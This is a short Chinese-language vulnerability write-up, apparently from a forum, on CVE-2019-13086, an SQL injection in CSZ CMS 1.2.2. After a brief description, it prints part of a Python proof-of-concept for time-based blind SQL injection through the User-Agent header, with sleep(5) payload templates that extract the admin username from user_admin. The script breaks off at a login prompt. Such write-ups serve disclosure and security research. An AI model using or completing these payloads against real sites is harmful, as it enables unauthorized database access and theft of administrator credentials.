CVE-2019-13086 CSZ CMS 1.2.2 sql注入漏洞
一、漏洞简介
CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.2版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
二、漏洞影响
CSZ CMS 1.2.2版本(2019-06-20之前)
三、复现过程
poc
import requests
import time
import threading
import multiprocessing
pool="admin$ABCDEFGHIJKLMNOPQRSTUVWXYZ"+" "+"bcefghjklopqrstuvwxyz1234567890/."
mutex=0
#获取长度用的User-Agent模板
ual="'-(if((length((select name from user_admin limit 1))=10),sleep(5),1))-'', '127.0.0.1','time') #"
#"Why don't you just build something"
#----------------------------------------------------获取管理员用户名长度--------------------------------------------
def getlength(field,tbname,total):
ual_head="'-(if((length((select " #这些空格一定要保留
ual_middle=" limit 1))="
num=1
ual_last="),sleep(5),1))-'', '127.0.0.1','time') #"
datas={'email':'111@111.com',
'password':'111'
}
请登录后查看回复内容